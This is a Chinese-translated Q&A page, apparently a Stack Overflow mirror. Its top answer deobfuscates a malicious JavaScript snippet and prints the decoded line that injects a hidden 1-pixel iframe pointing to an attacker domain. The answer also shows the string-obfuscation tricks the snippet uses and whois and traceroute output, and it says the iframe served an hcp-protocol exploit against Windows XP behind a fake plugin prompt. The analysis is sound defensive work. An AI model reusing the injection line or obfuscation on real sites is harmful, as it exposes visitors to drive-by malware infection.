时间:2010-07-26 17:19:59

标签: javascript security

3 个答案:

答案 0 :(得分:42)

好的,所以这就是我想出来的......

基本上这个脚本执行

document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');

关键是:

oU[11][oU[9]][oU[10]](xZ);

oU是由以下行填充的数组:

oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);

oU [w]是对Array.push的引用。所以,调用它会将这13个项目推送到数组中。 f,hZ和r - > oU [11],oU [9]和oU [10]分别是:

var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');  // evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, ''); // evaluates to "append"

因此,这会变为document['body']['append']document.body.append()

xZ是iframe字符串,因此它将iframe添加到页面中。虽然直接点击macromediasetup.com只是重定向到adobe.com,但击中僵尸路线会有一些完全不同的事情......

此域名的whois显示它不属于adobe所有:

$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111

Domain Name: MACROMEDIASETUP.COM

Registrant:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Creation Date: 28-May-2010
Expiration Date: 28-May-2011

Domain servers in listed order:
    ns2.reg.ru
    ns1.reg.ru


Administrative Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Technical Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Billing Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Traceroute表明它正在拉脱维亚的某个地方......

 7  nyk-bb1-link.telia.net (80.91.252.162)  77.169 ms  77.401 ms  77.327 ms
 8  kbn-bb1-link.telia.net (80.91.254.88)  156.938 ms  156.960 ms  156.842 ms
 9  s-bb1-link.telia.net (80.91.247.160)  166.491 ms  166.425 ms  166.499 ms
10  s-b3-link.telia.net (80.91.247.105)  212.715 ms  212.759 ms  212.776 ms
11  telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134)  203.272 ms  203.313 ms  203.936 ms

编辑好吧所以我做了一点挖掘,只是因为它很有趣而且我弄清楚到底发生了什么。 iframe中包含的文件将检索一个文件,该文件将对Windows XP计算机使用“hcp”协议黑客攻击。基本上,包含的文件将在您的浏览器中显示“您需要安装一些您没有的漂亮插件”消息...然后,当您安装它时,您就在大便中。

答案 1 :(得分:7)

答案 2 :(得分:4)